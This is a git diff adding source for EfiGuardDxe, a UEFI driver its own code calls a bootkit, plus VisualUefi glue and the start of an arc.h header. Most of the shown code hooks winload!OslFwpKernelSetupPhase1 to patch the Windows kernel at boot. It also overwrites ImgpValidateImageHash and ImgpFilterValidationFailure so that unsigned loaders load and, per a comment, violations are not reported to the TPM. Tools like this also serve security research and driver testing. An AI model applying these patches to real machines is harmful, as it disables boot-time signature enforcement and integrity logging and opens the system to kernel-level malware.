xrefs to EfipGetRsdt +STATIC CONST UINT8 SigOslFwpKernelSetupPhase1[] = { + 0xE8, 0xCC, 0xCC, 0xCC, 0xCC, // call BlpArchSwitchContext + 0x48, 0x8B, 0x05, 0xCC, 0xCC, 0xCC, 0xCC, // mov rax, gBS + 0xCC, 0x8B, 0xCC, // mov rdx, XX + 0x48, 0x8B, 0x0D, 0xCC, 0xCC, 0xCC, 0xCC // mov rcx, EfiImageHandle +}; + +STATIC UNICODE_STRING ImgpFilterValidationFailureMessage = RTL_CONSTANT_STRING(L"*** Windows is unable to verify the signature of"); // newline, etc etc... + +// Signature for winload!BlStatusPrint. This is only needed if winload.efi does not export it (RS4 and earlier) +// Windows 10 only. I could find a universal signature for this, but I rarely need the debugger output anymore... +STATIC CONST UINT8 SigBlStatusPrint[] = { + 0x48, 0x8B, 0xC4, // mov rax, rsp + 0x48, 0x89, 0x48, 0x08, // mov [rax+8], rcx + 0x48, 0x89, 0x50, 0x10, // mov [rax+10h], rdx + 0x4C, 0x89, 0x40, 0x18, // mov [rax+18h], r8 + 0x4C, 0x89, 0x48, 0x20, // mov [rax+20h], r9 + 0x53, // push rbx + 0x48, 0x83, 0xEC, 0x40, // sub rsp, 40h + 0xE8, 0xCC, 0xCC, 0xCC, 0xCC, // call BlBdDebuggerEnabled + 0x84, 0xC0, // test al, al + 0x74, 0xCC // jz XX +}; + + +NTSTATUS +EFIAPI +BlStatusPrintNoop( + IN CONST CHAR16 *Format, + ... + ) +{ + return 0xC00000BBL; // STATUS_NOT_SUPPORTED +} + +t_BlStatusPrint gBlStatusPrint = BlStatusPrintNoop; + +// +// Gets a loaded module entry from the boot loader's LoadOrderList +// +STATIC +PKLDR_DATA_TABLE_ENTRY +EFIAPI +GetBootLoadedModule( + IN LIST_ENTRY* LoadOrderListHead, + IN CHAR16* ModuleName + ) +{ + if (ModuleName == NULL || LoadOrderListHead == NULL) + return NULL; + + for (LIST_ENTRY* ListEntry = LoadOrderListHead->ForwardLink; ListEntry != LoadOrderListHead; ListEntry = ListEntry->ForwardLink) + { + // This is fairly heavy abuse of CR(), but legal C because (only) the first field of a struct is guaranteed to be at offset 0 (C99 6.7.2.1, point 13) + CONST PBLDR_DATA_TABLE_ENTRY Entry = (PBLDR_DATA_TABLE_ENTRY)BASE_CR(ListEntry, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks); + if (Entry != NULL && StrnCmp(Entry->KldrEntry.BaseDllName.Buffer, ModuleName, (Entry->KldrEntry.BaseDllName.Length / sizeof(CHAR16))) == 0) + return &Entry->KldrEntry; + } + return NULL; +} + +// +// winload.efi!OslFwpKernelSetupPhase1 hook to patch ntoskrnl.exe +// +EFI_STATUS +EFIAPI +HookedOslFwpKernelSetupPhase1( + IN PLOADER_PARAMETER_BLOCK LoaderBlock + ) +{ + // Restore the original function bytes that we replaced with our hook + CopyMem((VOID*)gOriginalOslFwpKernelSetupPhase1, gOslFwpKernelSetupPhase1Backup, sizeof(gOslFwpKernelSetupPhase1Backup)); + + UINT8* LoadOrderListHeadAddress = (UINT8*)&LoaderBlock->LoadOrderListHead; + if (gKernelPatchInfo.LegacyLoaderBlock) + { + // We are booting Vista or some other fossil, which means that our LOADER_PARAMETER_BLOCK declaration in no way matches what is + // actually being passed by the loader. Notably, the first four UINT32 fields are absent, so fix up the list entry pointer. + LoadOrderListHeadAddress -= FIELD_OFFSET(LOADER_PARAMETER_BLOCK, LoadOrderListHead); + } + + // Get the kernel entry from the loader block's LoadOrderList + CONST PKLDR_DATA_TABLE_ENTRY KernelEntry = GetBootLoadedModule((LIST_ENTRY*)LoadOrderListHeadAddress, L"ntoskrnl.exe"); + if (KernelEntry == NULL) + { + gKernelPatchInfo.Status = EFI_LOAD_ERROR; + PRINT_KERNEL_PATCH_MSG(L"[HookedOslFwpKernelSetupPhase1] Failed to find ntoskrnl.exe in LoadOrderList!\r\n"); + goto CallOriginal; + } + + VOID* KernelBase = KernelEntry->DllBase; + CONST UINT32 KernelSize = KernelEntry->SizeOfImage; + CONST PEFI_IMAGE_NT_HEADERS NtHeaders = KernelBase != NULL && KernelSize > 0 + ? RtlpImageNtHeaderEx(KernelBase, (UINTN)KernelSize) + : NULL; + if (KernelBase == NULL || KernelSize == 0) + { + gKernelPatchInfo.Status = EFI_NOT_FOUND; + PRINT_KERNEL_PATCH_MSG(L"[HookedOslFwpKernelSetupPhase1] Kernel image at 0x%p with size 0x%lx is invalid!\r\n", KernelBase, KernelSize); + goto CallOriginal; + } + + // Patch the kernel + gKernelPatchInfo.KernelBase = KernelBase; + gKernelPatchInfo.Status = PatchNtoskrnl(KernelBase, + NtHeaders); + +CallOriginal: + // No error handling here (not a lot of options). This is done in the ExitBootServices() callback which reads the patch status + + // Call the original function to transfer execution back to winload!OslFwpKernelSetupPhase1 + return gOriginalOslFwpKernelSetupPhase1(LoaderBlock); +} + +// +// Patches ImgpValidateImageHash in bootmgfw.efi, bootmgr.efi, and winload.[efi|exe] to allow loading modified kernels and boot loaders. +// Failures are ignored because this patch is not needed for the bootkit to work +// +EFI_STATUS +EFIAPI +PatchImgpValidateImageHash( + IN INPUT_FILETYPE FileType, + IN UINT8* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders + ) +{ + // This works on pretty much anything really + ASSERT(FileType == WinloadExe || FileType == BootmgfwEfi || FileType == BootmgrEfi || FileType == WinloadEfi); + CONST CHAR16* ShortName = FileType == BootmgfwEfi ? L"bootmgfw" : (FileType == BootmgrEfi ? L"bootmgr" : L"winload"); + + CONST PEFI_IMAGE_SECTION_HEADER CodeSection = IMAGE_FIRST_SECTION(NtHeaders); + + CONST UINT32 CodeSizeOfRawData = CodeSection->SizeOfRawData; + CONST UINT8* CodeStartVa = ImageBase + CodeSection->VirtualAddress; + + Print(L"== Disassembling .text to find %S!ImgpValidateImageHash ==\r\n", ShortName); + UINT8* AndMinusFortyOneAddress = NULL; + + // Initialize Zydis + ZydisDecoder Decoder; + ZyanStatus Status = ZydisInit(NtHeaders, &Decoder, NULL); + if (!ZYAN_SUCCESS(Status)) + { + Print(L"Failed to initialize disassembler engine.\r\n"); + return EFI_LOAD_ERROR; + } + + CONST UINTN Length = CodeSizeOfRawData; + UINTN Offset = 0; + ZyanU64 InstructionAddress; + ZydisDecodedInstruction Instruction; + + // Start decode loop + while ((InstructionAddress = (ZyanU64)(CodeStartVa + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + // Check if this is 'and REG32, 0FFFFFFD7h' (only esi and r8d are used here really) + if (Instruction.operand_count == 3 && + (Instruction.length == 3 || Instruction.length == 4) && + Instruction.mnemonic == ZYDIS_MNEMONIC_AND && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER && + Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_IMMEDIATE && + Instruction.operands[1].imm.is_signed == ZYAN_TRUE && + Instruction.operands[1].imm.value.s == (ZyanI64)((ZyanI32)0xFFFFFFD7)) // Sign extend to 64 bits + { + AndMinusFortyOneAddress = (UINT8*)InstructionAddress; + break; + } + + Offset += Instruction.length; + } + + // Backtrack to function start + CONST UINT8* ImgpValidateImageHash = BacktrackToFunctionStart(AndMinusFortyOneAddress, CodeStartVa); + if (ImgpValidateImageHash == NULL) + { + Print(L" Failed to find %S!ImgpValidateImageHash%S.\r\n", + ShortName, (AndMinusFortyOneAddress == NULL ? L" 'and xxx, 0FFFFFFD7h' instruction" : L"")); + return EFI_NOT_FOUND; + } + + // Apply the patch + *((UINT32*)ImgpValidateImageHash) = 0xC3C033; // xor eax, eax, ret + + // Print info + Print(L" Patched %S!ImgpValidateImageHash [RVA: 0x%X].\r\n", + ShortName, (UINT32)(ImgpValidateImageHash - ImageBase)); + + return EFI_SUCCESS; +} + +// +// Patches ImgpFilterValidationFailure in bootmgfw.efi, bootmgr.efi, and winload.[efi|exe] +// Failures are ignored because this patch is not needed for the bootkit to work +// +EFI_STATUS +EFIAPI +PatchImgpFilterValidationFailure( + IN INPUT_FILETYPE FileType, + IN UINT8* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders + ) +{ + // This works on pretty much anything really + ASSERT(FileType == WinloadExe || FileType == BootmgfwEfi || FileType == BootmgrEfi || FileType == WinloadEfi); + CONST CHAR16* ShortName = FileType == BootmgfwEfi ? L"bootmgfw" : (FileType == BootmgrEfi ? L"bootmgr" : L"winload"); + + // Find .text and/or .rdata sections + PEFI_IMAGE_SECTION_HEADER PatternSection = NULL, CodeSection = NULL; + PEFI_IMAGE_SECTION_HEADER Section = IMAGE_FIRST_SECTION(NtHeaders); + for (UINT16 i = 0; i < NtHeaders->FileHeader.NumberOfSections; ++i) + { + if (CompareMem(Section->Name, ".text", sizeof(".text") - 1) == 0) + CodeSection = Section; + if ((FileType == BootmgfwEfi || FileType == BootmgrEfi) && + CompareMem(Section->Name, ".text", sizeof(".text") - 1) == 0) // [bootmgfw|bootmgr].efi (usually) has no .rdata section, and starting at .text is always fine + PatternSection = Section; + else if ((FileType == WinloadExe || FileType == WinloadEfi) && + CompareMem(Section->Name, ".rdata", sizeof(".rdata") - 1) == 0) // For winload.[exe|efi] the string is in .rdata + PatternSection = Section; + Section++; + } + + ASSERT(PatternSection != NULL); + ASSERT(CodeSection != NULL); + + CONST UINT32 PatternStartRva = PatternSection->VirtualAddress; + CONST UINT32 PatternSizeOfRawData = PatternSection->SizeOfRawData; + CONST UINT8* PatternStartVa = ImageBase + PatternStartRva; + + CHAR8 SectionName[EFI_IMAGE_SIZEOF_SHORT_NAME + 1]; + CopyMem((VOID*)SectionName, (VOID*)PatternSection->Name, EFI_IMAGE_SIZEOF_SHORT_NAME); + SectionName[EFI_IMAGE_SIZEOF_SHORT_NAME] = '\0'; + Print(L"\r\n== Searching for load failure string in %a [RVA: 0x%X - 0x%X] ==\r\n", + SectionName, PatternStartRva, PatternStartRva + PatternSizeOfRawData); + + // Search for the black screen of death string "Windows is unable to verify the integrity of the file [...]" + UINT8* IntegrityFailureStringAddress = NULL; + for (UINT8* Address = (UINT8*)PatternStartVa; + Address < ImageBase + NtHeaders->OptionalHeader.SizeOfImage - ImgpFilterValidationFailureMessage.MaximumLength; + ++Address) + { + if (CompareMem(Address, ImgpFilterValidationFailureMessage.Buffer, ImgpFilterValidationFailureMessage.Length) == 0) + { + IntegrityFailureStringAddress = Address; + Print(L" Found load failure string at 0x%llx.\r\n", (UINTN)IntegrityFailureStringAddress); + break; + } + } + + if (IntegrityFailureStringAddress == NULL) + { + Print(L" Failed to find load failure string.\r\n"); + return EFI_NOT_FOUND; + } + + CONST UINT32 CodeStartRva = CodeSection->VirtualAddress; + CONST UINT32 CodeSizeOfRawData = CodeSection->SizeOfRawData; + CONST UINT8* CodeStartVa = ImageBase + CodeStartRva; + + ZeroMem((VOID*)SectionName, sizeof(SectionName)); + CopyMem((VOID*)SectionName, (VOID*)CodeSection->Name, EFI_IMAGE_SIZEOF_SHORT_NAME); + Print(L"== Disassembling %a to find %S!ImgpFilterValidationFailure ==\r\n", SectionName, ShortName); + UINT8* LeaIntegrityFailureAddress = NULL; + + // Initialize Zydis + ZydisDecoder Decoder; + ZyanStatus Status = ZydisInit(NtHeaders, &Decoder, NULL); + if (!ZYAN_SUCCESS(Status)) + { + Print(L"Failed to initialize disassembler engine.\r\n"); + return EFI_LOAD_ERROR; + } + + CONST UINTN Length = CodeSizeOfRawData; + UINTN Offset = 0; + ZyanU64 InstructionAddress; + ZydisDecodedInstruction Instruction; + + // Start decode loop + while ((InstructionAddress = (ZyanU64)(CodeStartVa + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + // Check if this is "lea REG, ds:[rip + offset_to_bsod_string]" + if (Instruction.operand_count == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_LEA && + Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_MEMORY && + Instruction.operands[1].mem.base == ZYDIS_REGISTER_RIP) + { + ZyanU64 OperandAddress = 0; + if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[1], InstructionAddress, &OperandAddress)) && + OperandAddress == (UINTN)IntegrityFailureStringAddress) + { + LeaIntegrityFailureAddress = (UINT8*)InstructionAddress; + Print(L" Found load instruction for load failure string at 0x%llx.\r\n", (UINTN)LeaIntegrityFailureAddress); + break; + } + } + + Offset += Instruction.length; + } + + // Backtrack to function start + CONST UINT8* ImgpFilterValidationFailure = BacktrackToFunctionStart(LeaIntegrityFailureAddress, LeaIntegrityFailureAddress - Length); + if (ImgpFilterValidationFailure == NULL) + { + Print(L" Failed to find %S!ImgpFilterValidationFailure%S.\r\n", + ShortName, (LeaIntegrityFailureAddress == NULL ? L" load failure string load instruction" : L"")); + return EFI_NOT_FOUND; + } + + // Apply the patch + *((UINT32*)ImgpFilterValidationFailure) = 0xC3C033; // xor eax, eax, ret + + // Print info + Print(L" Patched %S!ImgpFilterValidationFailure [RVA: 0x%X].\r\n\r\n", + ShortName, (UINT32)(ImgpFilterValidationFailure - ImageBase)); + + return EFI_SUCCESS; +} + +// +// Finds OslFwpKernelSetupPhase1 in winload.efi +// +EFI_STATUS +EFIAPI +FindOslFwpKernelSetupPhase1( + IN CONST UINT8* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders, + IN PEFI_IMAGE_SECTION_HEADER CodeSection, + IN PEFI_IMAGE_SECTION_HEADER PatternSection, + IN BOOLEAN TryPatternMatch, + OUT UINT8** OslFwpKernelSetupPhase1Address + ) +{ + *OslFwpKernelSetupPhase1Address = NULL; + + CONST UINT8* CodeStartVa = ImageBase + CodeSection->VirtualAddress; + CONST UINT32 CodeSizeOfRawData = CodeSection->SizeOfRawData; + CONST UINT8* PatternStartVa = ImageBase + PatternSection->VirtualAddress; + + if (TryPatternMatch) + { + // On Windows 10, try simple pattern matching first since it will most likely work + UINT8* Found = NULL; + CONST EFI_STATUS Status = FindPattern(SigOslFwpKernelSetupPhase1, + 0xCC, + sizeof(SigOslFwpKernelSetupPhase1), + (VOID*)CodeStartVa, + CodeSizeOfRawData, + (VOID**)&Found); + if (!EFI_ERROR(Status)) + { + // Found signature; backtrack to function start + *OslFwpKernelSetupPhase1Address = BacktrackToFunctionStart(Found, Found - 0x400); + if (*OslFwpKernelSetupPhase1Address != NULL) + { + Print(L"\r\nFound OslFwpKernelSetupPhase1 at 0x%llX.\r\n", (UINTN)(*OslFwpKernelSetupPhase1Address)); + return EFI_SUCCESS; // Found; early out + } + } + } + + // On older versions, use some convoluted but robust logic to find OslFwpKernelSetupPhase1 by matching xrefs to EfipGetRsdt. + // This of course implies finding EfipGetRsdt first. After that, find all calls to this function, and for each, calculate + // the distance from the start of the function to the call. OslFwpKernelSetupPhase1 is reliably (Vista through 10) + // the function that has the smallest value for this distance, i.e. the call happens very early in the function. + CHAR8 SectionName[EFI_IMAGE_SIZEOF_SHORT_NAME + 1]; + CopyMem(SectionName, PatternSection->Name, EFI_IMAGE_SIZEOF_SHORT_NAME); + SectionName[EFI_IMAGE_SIZEOF_SHORT_NAME] = '\0'; + Print(L"\r\n== Searching for EfipGetRsdt pattern in %a ==\r\n", SectionName); + + // Search for EFI ACPI 2.0 table GUID: { 8868e871-e4f1-11d3-bc22-0080c73c8881 } + UINT8* PatternAddress = NULL; + for (UINT8* Address = (UINT8*)PatternStartVa; + Address < ImageBase + NtHeaders->OptionalHeader.SizeOfImage - sizeof(gEfiAcpi20TableGuid); + ++Address) + { + if (CompareGuid((CONST GUID*)Address, &gEfiAcpi20TableGuid)) + { + PatternAddress = Address; + Print(L" Found EFI ACPI 2.0 GUID at 0x%llX.\r\n", (UINTN)PatternAddress); + break; + } + } + + if (PatternAddress == NULL) + { + Print(L" Failed to find EFI ACPI 2.0 GUID.\r\n"); + return EFI_NOT_FOUND; + } + + Print(L"\r\n== Disassembling .text to find EfipGetRsdt ==\r\n"); + UINT8* LeaEfiAcpiTableGuidAddress = NULL; + + // Initialize Zydis + ZydisDecoder Decoder; + ZyanStatus Status = ZydisInit(NtHeaders, &Decoder, NULL); + if (!ZYAN_SUCCESS(Status)) + { + Print(L"Failed to initialize disassembler engine.\r\n"); + return EFI_LOAD_ERROR; + } + + CONST UINTN Length = CodeSizeOfRawData; + UINTN Offset = 0; + ZyanU64 InstructionAddress; + ZydisDecodedInstruction Instruction; + + // Start decode loop + while ((InstructionAddress = (ZyanU64)(CodeStartVa + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + // Check if this is "lea rcx, ds:[rip + offset_to_acpi20_guid]" + if (Instruction.operand_count == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_LEA && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER && + Instruction.operands[0].reg.value == ZYDIS_REGISTER_RCX && + Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_MEMORY && + Instruction.operands[1].mem.base == ZYDIS_REGISTER_RIP) + { + ZyanU64 OperandAddress = 0; + if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[1], InstructionAddress, &OperandAddress)) && + OperandAddress == (UINTN)PatternAddress) + { + // Check for false positives (BlFwGetSystemTable) + CONST UINT8* Check = (UINT8*)(CodeStartVa + Offset - 4); // 4 = length of 'lea rdx, [r11+18h]' which precedes this instruction in EfipGetRsdt + if (Check[0] == 0x49 && Check[1] == 0x8D && Check[2] == 0x53) // If no match, this is not EfipGetRsdt + { + LeaEfiAcpiTableGuidAddress = (UINT8*)InstructionAddress; + Print(L" Found load instruction for EFI ACPI 2.0 GUID at 0x%llX.\r\n", (UINTN)LeaEfiAcpiTableGuidAddress); + break; + } + } + } + + Offset += Instruction.length; + } + + if (LeaEfiAcpiTableGuidAddress == NULL) + { + Print(L" Failed to find load instruction for EFI ACPI 2.0 GUID.\r\n"); + return EFI_NOT_FOUND; + } + + CONST UINT8* EfipGetRsdt = BacktrackToFunctionStart(LeaEfiAcpiTableGuidAddress, LeaEfiAcpiTableGuidAddress - Length); + if (EfipGetRsdt == NULL) + { + Print(L" Failed to find EfipGetRsdt.\r\n"); + return EFI_NOT_FOUND; + } + + Print(L" Found EfipGetRsdt at 0x%llX.\r\n", (UINTN)EfipGetRsdt); + Print(L"\r\n== Disassembling .text to find OslFwpKernelSetupPhase1 ==\r\n"); + UINT8* CallEfipGetRsdtAddress = NULL; + + // Start decode loop + Offset = 0; + UINTN ShortestDistanceToCall = MAX_UINTN; + while ((InstructionAddress = (ZyanU64)(CodeStartVa + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + // Check if this is 'call IMM' + if (Instruction.operand_count == 4 && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_IMMEDIATE && Instruction.operands[0].imm.is_relative == ZYAN_TRUE && + Instruction.mnemonic == ZYDIS_MNEMONIC_CALL) + { + // Check if this is 'call EfipGetRsdt' + ZyanU64 OperandAddress = 0; + if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, &OperandAddress)) && + OperandAddress == (UINTN)EfipGetRsdt) + { + // Calculate the distance from the start of the function to the instruction. OslFwpKernelSetupPhase1 will always have the shortest distance + CONST UINTN StartOfFunction = (UINTN)BacktrackToFunctionStart((UINT8*)InstructionAddress, (UINT8*)InstructionAddress - Length); + CONST UINTN Distance = InstructionAddress - StartOfFunction; + if (Distance < ShortestDistanceToCall) + { + CallEfipGetRsdtAddress = (UINT8*)InstructionAddress; + ShortestDistanceToCall = Distance; + } + } + } + + Offset += Instruction.length; + } + + if (CallEfipGetRsdtAddress == NULL) + { + Print(L" Failed to find a single 'call EfipGetRsdt' instruction.\r\n"); + return EFI_NOT_FOUND; + } + + // Found + *OslFwpKernelSetupPhase1Address = CallEfipGetRsdtAddress - ShortestDistanceToCall; + Print(L" Found OslFwpKernelSetupPhase1 at 0x%llX.\r\n\r\n", (UINTN)(*OslFwpKernelSetupPhase1Address)); + + return EFI_SUCCESS; +} + +// +// Patches winload.efi +// +EFI_STATUS +EFIAPI +PatchWinload( + IN VOID* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders + ) +{ + // Print file and version info + UINT16 MajorVersion = 0, MinorVersion = 0, BuildNumber = 0, Revision = 0; + EFI_STATUS Status = GetPeFileVersionInfo(ImageBase, &MajorVersion, &MinorVersion, &BuildNumber, &Revision, NULL); + if (EFI_ERROR(Status)) + Print(L"\r\nPatchWinload: WARNING: failed to obtain winload.efi version info. Status: %llx\r\n", Status); + else + { + Print(L"\r\nPatching winload.efi v%u.%u.%u.%u...\r\n", MajorVersion, MinorVersion, BuildNumber, Revision); + + // Check if this is a supported winload version. All patches should work on all versions since Vista SP1, + // except for the ImgpFilterValidationFailure patch because this function only exists on Windows 7 and higher. + if (BuildNumber < 6001) + { + Print(L"\r\nPatchWinload: ERROR: Unsupported winload.efi image version.\r\n"); + Status = EFI_UNSUPPORTED; + goto Exit; + } + + // Some... adjustments... need to be made later on in the case of pre-Windows 7 loader blocks + gKernelPatchInfo.LegacyLoaderBlock = BuildNumber < 7600; + } + + // Find the .text and .rdata sections + PEFI_IMAGE_SECTION_HEADER CodeSection = NULL, PatternSection = NULL; + PEFI_IMAGE_SECTION_HEADER Section = IMAGE_FIRST_SECTION(NtHeaders); + for (UINT16 i = 0; i < NtHeaders->FileHeader.NumberOfSections; ++i) + { + CHAR8 SectionName[EFI_IMAGE_SIZEOF_SHORT_NAME + 1]; + CopyMem(SectionName, Section->Name, EFI_IMAGE_SIZEOF_SHORT_NAME); + SectionName[MAX(sizeof(".text"), sizeof(".rdata"))] = '\0'; + + if (AsciiStrCmp(SectionName, ".text") == 0) + CodeSection = Section; + else if (AsciiStrCmp(SectionName, ".rdata") == 0) + PatternSection = Section; + + Section++; + } + + ASSERT(CodeSection != NULL); + ASSERT(PatternSection != NULL); + + // (Optional) On Windows 10, find winload!BlStatusPrint + if (BuildNumber >= 10240) + { + gBlStatusPrint = (t_BlStatusPrint)GetProcedureAddress((UINTN)ImageBase, NtHeaders, "BlStatusPrint"); + if (gBlStatusPrint == NULL) + { + // Not exported (RS4 and earlier) - try to find by signature + FindPattern(SigBlStatusPrint, + 0xCC, + sizeof(SigBlStatusPrint), + (VOID*)((UINT8*)ImageBase + CodeSection->VirtualAddress), + CodeSection->SizeOfRawData, + (VOID**)&gBlStatusPrint); + if (gBlStatusPrint == NULL) + { + gBlStatusPrint = BlStatusPrintNoop; + Print(L"\r\nWARNING: winload!BlStatusPrint not found. No boot debugger output will be available.\r\n"); + } + } + } + + // Find winload!OslFwpKernelSetupPhase1 + Status = FindOslFwpKernelSetupPhase1((UINT8*)ImageBase, + NtHeaders, + CodeSection, + PatternSection, + (BOOLEAN)(BuildNumber >= 10240), + (UINT8**)&gOriginalOslFwpKernelSetupPhase1); + if (EFI_ERROR(Status)) + { + Print(L"\r\nPatchWinload: failed to find OslFwpKernelSetupPhase1. Status: %llx\r\n", Status); + goto Exit; + } + + Print(L"HookedOslFwpKernelSetupPhase1 at 0x%p.\r\n", (VOID*)&HookedOslFwpKernelSetupPhase1); + + CONST EFI_TPL Tpl = gBS->RaiseTPL(TPL_HIGH_LEVEL); // Note: implies cli + + // Backup original function prologue + CopyMem(gOslFwpKernelSetupPhase1Backup, (VOID*)gOriginalOslFwpKernelSetupPhase1, sizeof(gOslFwpKernelSetupPhase1Backup)); + + // Place faux call (push addr, ret) at the start of the function to transfer execution to our hook + CopyMem((VOID*)gOriginalOslFwpKernelSetupPhase1, (VOID*)gHookTemplate, sizeof(gHookTemplate)); + *(UINTN*)((UINT8*)gOriginalOslFwpKernelSetupPhase1 + 2) = (UINTN)&HookedOslFwpKernelSetupPhase1; + + gBS->RestoreTPL(Tpl); + + // Patch ImgpValidateImageHash to allow custom boot loaders. This is completely + // optional (unless booting a custom ntoskrnl.exe), and failures are ignored + PatchImgpValidateImageHash(WinloadEfi, + (UINT8*)ImageBase, + NtHeaders); + + if (BuildNumber >= 7600) + { + // Patch ImgpFilterValidationFailure so it doesn't silently + // rat out every violation to a TPM or SI log. Also optional + PatchImgpFilterValidationFailure(WinloadEfi, + (UINT8*)ImageBase, + NtHeaders); + } + +Exit: + if (EFI_ERROR(Status)) + { + // Patch failed. Prompt user to ask what they want to do + Print(L"\r\nPress any key to continue anyway, or press ESC to reboot.\r\n"); + if (!WaitForKey()) + { + gRT->ResetSystem(EfiResetCold, EFI_SUCCESS, 0, NULL); + } + } + else + { + Print(L"Successfully patched winload!OslFwpKernelSetupPhase1.\r\n"); + RtlSleep(2000); + + if (gDriverConfig.WaitForKeyPress) + { + Print(L"\r\nPress any key to continue.\r\n"); + WaitForKey(); + } + } + + // Return success, because even if the patch failed, the user chose not to reboot above + return EFI_SUCCESS; +} diff --git a/EfiGuardDxe/VisualUefi.c b/EfiGuardDxe/VisualUefi.c new file mode 100644 index 0000000..ec02953 --- /dev/null +++ b/EfiGuardDxe/VisualUefi.c @@ -0,0 +1,108 @@ +// +// This file adds some things that are needed by VisualUefi. It should not be included under [Sources] of EDK2 .inf files. +// +#ifdef VISUALUEFI + +#include <Uefi.h> +#include <Protocol/DriverSupportedEfiVersion.h> +#include <Protocol/EfiGuard.h> +#include <Guid/Acpi.h> +#include <Library/DebugLib.h> + + +// +// The following fields are automatically generated by the EDK2 build system, but VisualUefi expects them in the source code. +// +CONST UINT8 _gDriverUnloadImageCount = 1; +CONST UINT32 _gUefiDriverRevision = 0x210; +CONST UINT32 _gDxeRevision = 0x210; +CHAR8 *gEfiCallerBaseName = "EfiGuardDxe"; + + +// +// EfiGuard Bootkit Driver Protocol +// +EFI_GUID gEfiGuardDriverProtocolGuid = EFI_EFIGUARD_DRIVER_PROTOCOL_GUID; + + +// +// GUIDs +// +EFI_GUID gEfiDriverSupportedEfiVersionProtocolGuid = EFI_DRIVER_SUPPORTED_EFI_VERSION_PROTOCOL_GUID; +EFI_GUID gEfiAcpi20TableGuid = EFI_ACPI_20_TABLE_GUID; + + +// +// Placeholder definitions to make linking against BaseSynchronizationLib possible. See https://github.com/ionescu007/VisualUefi/issues/25 +// This is not a problem for us because we don't use spinlocks, only interlocked operations. +// +UINTN +EFIAPI +InternalGetSpinLockProperties( + VOID + ) +{ + ASSERT(FALSE); + return (UINTN)-1; +} + +UINT64 +EFIAPI +GetPerformanceCounter( + VOID + ) +{ + ASSERT(FALSE); + return (UINT64)-1; +} + +UINT64 +EFIAPI +GetPerformanceCounterProperties( + OUT UINT64 *StartValue OPTIONAL, + OUT UINT64 *EndValue OPTIONAL + ) +{ + ASSERT(FALSE); + return (UINT64)-1; +} + + +// +// Entry/unload handlers that VisualUefi expects with predefined names +// +extern +EFI_STATUS +EFIAPI +EfiGuardInitialize( + IN EFI_HANDLE ImageHandle, + IN EFI_SYSTEM_TABLE *SystemTable + ); + +EFI_STATUS +EFIAPI +UefiMain( + IN EFI_HANDLE ImageHandle, + IN EFI_SYSTEM_TABLE *SystemTable + ) +{ + return EfiGuardInitialize(ImageHandle, SystemTable); +} + +extern +EFI_STATUS +EFIAPI +EfiGuardUnload( + IN EFI_HANDLE ImageHandle + ); + +EFI_STATUS +EFIAPI +UefiUnload( + IN EFI_HANDLE ImageHandle + ) +{ + return EfiGuardUnload(ImageHandle); +} + +#endif // VISUALUEFI diff --git a/EfiGuardDxe/Zydis b/EfiGuardDxe/Zydis new file mode 160000 +Subproject c307b4306e0800f8b9a6a2992b934219bdf956c diff --git a/EfiGuardDxe/arc.h b/EfiGuardDxe/arc.h new file mode 100644 index 0000000..0bd5a0b --- /dev/null +++ b/EfiGuardDxe/arc.h @@ -0,0 +1,1317 @@ +/*++ BUILD Version: 0011 // Increment this if a change has global effects + +Copyright (c) Microsoft Corporation. All rights reserved. + +Module Name: + + arc.h + +Abstract: + + This header file defines the ARC system firmware interface and the + NT structures that are dependent on ARC types. + + This module may not contain any definitions that are exposed in + public kit headers. + +Author: + + David N. Cutler (davec) 18-May-1991 + +Revision History: + + James E. Moe (jamoe) 23-Jan-2003 + Public/Private header split + +--*/ + +// +// Despite the notice above, this file was 'exposed in public kit headers' in the Windows 10.0.10586.0 WDK. Oops. +// Some of these types also (re)appear seemingly at random in public PDBs, notably 10.0.17134.0+ and the Windows 7 ones. +// Much more info at https://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/loader_parameter_block.htm +// + +#pragma once + +#include "ntdef.h" + +// +// Define configuration routine types. +// +// Configuration information. +// +typedef enum _CONFIGURATION_TYPE { + ArcSystem, + CentralProcessor, + FloatingPointProcessor, + PrimaryIcache, + PrimaryDcache, + SecondaryIcache, + SecondaryDcache, + SecondaryCache, + EisaAdapter, + TcAdapter, + ScsiAdapter, + DtiAdapter, + MultiFunctionAdapter, + DiskController, + TapeController, + CdromController, + WormController, + SerialController, + NetworkController, + DisplayController, + ParallelController, + PointerController, + KeyboardController, + AudioController, + OtherController, + DiskPeripheral, + FloppyDiskPeripheral, + TapePeripheral, + ModemPeripheral, + MonitorPeripheral, + PrinterPeripheral, + PointerPeripheral, + 